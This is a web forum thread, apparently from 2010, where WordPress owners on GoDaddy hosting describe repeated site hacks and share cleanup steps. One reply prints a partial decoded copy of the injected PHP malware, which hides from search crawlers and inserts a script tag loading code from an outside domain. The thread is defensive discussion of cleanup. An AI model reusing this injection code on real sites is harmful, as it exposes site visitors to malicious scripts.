1. Advertising
    y u no do it?

    Advertising (learn more)

    Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

    Starts at just $1 per CPM or $0.10 per CPC.

Wordpress Site Hacked - Please HELP !!!

Discussion in 'Databases' started by Hema Latha, Apr 15, 2010.

  1. Hema Latha

    Hema Latha Peon

    Messages:
    18
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #21
    @ Blue Star Ent.

    I have AVG Pro version. My system is clean.
    SEMrush
     
    Hema Latha, May 1, 2010 IP
    SEMrush
  2. Hema Latha

    Hema Latha Peon

    Messages:
    18
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #22
    I Restored all the files using Godaddy File Manager.

    Site is working and unable to find the kdjkfjskdfjlskdjf script in the page source and the eval base code in the php files.

    But when i tried to Login to Wp-admin, I got this message from AVG:


    I'm unable to access the wp admin/login panel.
     
    Hema Latha, May 1, 2010 IP
  3. Hema Latha

    Hema Latha Peon

    Messages:
    18
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #23
    ISSUE RESOLVED TEMPORARILY

    1. Restored files using Godaddy file manager.

    After restoration, site worked but the Login/Admin page was redirected to the virus site.

    2. Replaced Wp-admin & Wp-includes.

    Issue resolved.

    WAITING FOR THE THIRD ATTACK
     
    Hema Latha, May 1, 2010 IP
  4. Blue Star Ent.

    Blue Star Ent. Well-Known Member

    Messages:
    1,955
    Likes Received:
    30
    Best Answers:
    0
    Trophy Points:
    160
    #24
    What version of Wordpress are you using ?
     
    Blue Star Ent., May 1, 2010 IP
  5. latinocool79

    latinocool79 Peon

    Messages:
    1
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #25
    Ok guys,

    So I had my third attack last Friday. First one was over a month ago and I felt like dying cause blogging is my job. I spent more than 10 hours trying different things until I finally got it solved. Now it takes me 20 or 30 minutes and I am trying to make it stop attacking me but maybe there is a code i can't manage to catch that is hidden.

    Anyway this is what I do.

    1) cleaning wp files
    First have a copy of your database. Then I go and make a copy of wp-config.php and manually clean the malicious code. Then I do a reinstall of wordpress and from my automatic plugin.

    2) Cleaning theme or themes
    I had a clean copy of my clean them so i just copy and paste on top of the infected theme. If you do not have a saved theme then upload a new one. It may be a little work to format at again but cleaning it manually takes too much time but it is also an option.

    3) Reload plugins
    All plugins are infected or potentially nesters so I also deactivate all, delete and reinstall fresh copies.

    4) Check for other php files that are not in wp files, themes, and plugins
    There are some index files that are in our wordpress file that we have to clean manually. These are critical because if not cleaned you will get attacked again. Also, if you have other folders and with wordpress folders in them you have to repeat the process for every folder.

    These are my steps and now to clean it, it only takes me 20 to 30 minutes and it all runs well. I am trying to work on checking how to prevent it. My 3rd attack came from a buddypress folder that I forgot to delete and that was totally infected by my 2d attack. Now the 2nd attack I dont know how it came to be.
     
    latinocool79, May 2, 2010 IP
  6. Blue Star Ent.

    Blue Star Ent. Well-Known Member

    Messages:
    1,955
    Likes Received:
    30
    Best Answers:
    0
    Trophy Points:
    160
    #26

    I believe that if you can raise the permissions on the files to be unwritable, you will not have these problems. The same for step 4.
     
    Blue Star Ent., May 2, 2010 IP
  7. mustaineoz

    mustaineoz Active Member

    Messages:
    327
    Likes Received:
    3
    Best Answers:
    0
    Trophy Points:
    58
    #27
    Have the same problem. I got attacked 2 times last 1 month and I'm using godaddy too. It's a simple .html file and just before </body> tag, I can see this script.

    About 2 weeks ago I noticed this at my site (instead of kdjkfjskdfjlskdjf.com/kp.php, it was linked to another site) and replaced everything at the server. Today I just checked my statistics and I could see a big drop at the visitors so I checked my site and it's there again.
    IF I hacked, then I would have problems with my other sites and I don't. This is godaddy problem and somebody at the server (where my site is located) doing this (this was what I found out when I did a quick search 2 weeks ago)

    Bad part is SEO. I think google punished my site since I'm having 20-25% visitors compared to 1-2 weeks ago :(
     
    mustaineoz, May 8, 2010 IP
  8. Blue Star Ent.

    Blue Star Ent. Well-Known Member

    Messages:
    1,955
    Likes Received:
    30
    Best Answers:
    0
    Trophy Points:
    160
    #28
    Make the files unwritable after you fix them. If you find they are changed again, and it was not you, then it is as you say, your webhost.

     
    Blue Star Ent., May 8, 2010 IP
  9. techlineinfo

    techlineinfo Active Member

    Messages:
    117
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    51
    #29
    There is some issues with Godaddy servers. A number of Godaddy hosted CMS sites affected with malwares which redirect to fake anti virus search results or sites. My friend's forum affected with this a couple of times and Godaddy is reluctant to accept the security loopholes at their end
     
    techlineinfo, May 8, 2010 IP
  10. Ripul

    Ripul Member

    Messages:
    252
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    26
    #30
    Try decoding that string and you get this,
    it will take time to understand this logic. This is basically calling the script see the line below.If you have wp-cache plugin please uninstall it.

    if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){ $GLOBALS['mr_no']=1; if(!function_exists('mrobh')){ if(!function_exists('gml')){ function gml(){ if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&& (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))){ return

    base64_decode("PHNjcmlwdCBzcmM9Imh0dHA6Ly9rZGprZmpza2Rmamxza2RqZi5jb20va3AucGhwIj48L3NjcmlwdD4=");

    Which means <script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>


    } return ""; } } if(!function_exists('gzdecode')){

    function gzdecode($R5A9CF1B497502ACA23C8F611A564684C){ $R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1));

    ..........
     
    Ripul, May 8, 2010 IP
  11. AdrianneIzaguirre

    AdrianneIzaguirre Peon

    Messages:
    462
    Likes Received:
    3
    Best Answers:
    0
    Trophy Points:
    0
    #31
    This has happened to me before. It's what you call an iframe hack. The first thing you will need to do is clean up your computer with any malware, make sure you do a disk defrag, and call your hosting company after. Either you or they can remove it in the coding. However, it is important that you have them change your password as soon as possible.
     
    Last edited: May 9, 2010
    AdrianneIzaguirre, May 9, 2010 IP
  12. Blue Star Ent.

    Blue Star Ent. Well-Known Member

    Messages:
    1,955
    Likes Received:
    30
    Best Answers:
    0
    Trophy Points:
    160
    #32
    What would defragging the person´s computer do to help this problem ?

     
    Blue Star Ent., May 9, 2010 IP
  13. truz

    truz Active Member

    Messages:
    61
    Likes Received:
    8
    Best Answers:
    0
    Trophy Points:
    78
    #33
    I would recommend moving to another provider if your having security issues and they fail to address them all 3 times.

    This could also be a flaw with your anti virus. Try running a web based scanner and see if anything comes up.

    If you need any help please contact me.
     
    truz, May 9, 2010 IP
  14. AlcVitRes

    AlcVitRes Active Member

    Messages:
    124
    Likes Received:
    3
    Best Answers:
    0
    Trophy Points:
    80
    #34
    1. First check (completely) security of your computer.
    I had only 1 issue of virus on one of sites in last 3 years
    by friend of mine with his loose antivirus/FTP software.

    2. Install WordPress from 0 (newest version), don't use
    any additional plugins. Check configuration files CHMOD.

    3. Restore or upgrade your DB by instructions provided in
    manual (if you had used older WP version before upgrade).

    X. I use GoDaddy ~2 years with other CMS. No problems.
     
    AlcVitRes, May 9, 2010 IP
  15. actress143

    actress143 Peon

    Messages:
    132
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #35
    Friend godaddy is unfit for the wordpress webhosting.....,

    Godaddy is one of the waste...., i faced lot of problems.. me to get the same situation and the support guys saying some thing.. hit movie stories..

    just leave it.

    Check this

    https://www.sharkspace.com/sharkcenter/aff.php?aff=272

    Awesome hosting i am using for last 2 years super support is almost instant.
     
    actress143, May 11, 2010 IP
  16. TheRichBlog

    TheRichBlog Peon

    Messages:
    48
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #36
    here is my 2cents

    two of my wp blogs on godaddy got hacked yesterday. they are modifying all php files on the server. luckily i was able to get rid of them restoring the files thru file manager..

    there is an option to see historical versions of the files. i archived all files from the day before they got changed and unzipped them all and overwrite current files.. no problems so far.. but it looks like this is a serious problem with godaddy.

    keep an eye on the "last modified date" of your php files..
     
    TheRichBlog, May 14, 2010 IP
  17. Ndoki

    Ndoki Peon

    Messages:
    3
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #37
    Go over to DigitalDrake.com and find article "WordPress Hack Cleanup Solution". You will see the link over in the "Recent Posts" section on that site.
     
    Ndoki, May 30, 2010 IP
  18. aeroz1

    aeroz1 Active Member

    Messages:
    492
    Likes Received:
    2
    Best Answers:
    0
    Trophy Points:
    53
    #38
    I am also having an issue with this. totally lost as to how I might go about fixing it. attemtping to scan databse.
     
    aeroz1, Jun 8, 2010 IP
  19. nekabloggymedia

    nekabloggymedia Active Member

    Messages:
    55
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    63
    #39
    Which hosting service you use? Contact with them via email or live chat or call them and tell them your problem.
    They can solve your problem instantly.

    Regards
     
    nekabloggymedia, Jan 21, 2017 IP
  20. Zoti Media Group

    Zoti Media Group Notable Member

    Messages:
    1,568
    Likes Received:
    107
    Best Answers:
    2
    Trophy Points:
    215
    Digital Goods:
    2
    #40
    He was waiting for you for 7 years to tell him to contact his hosting provider. Holly crap.
     
    Zoti Media Group, Jan 21, 2017 IP
    mmerlinn and deathshadow like this.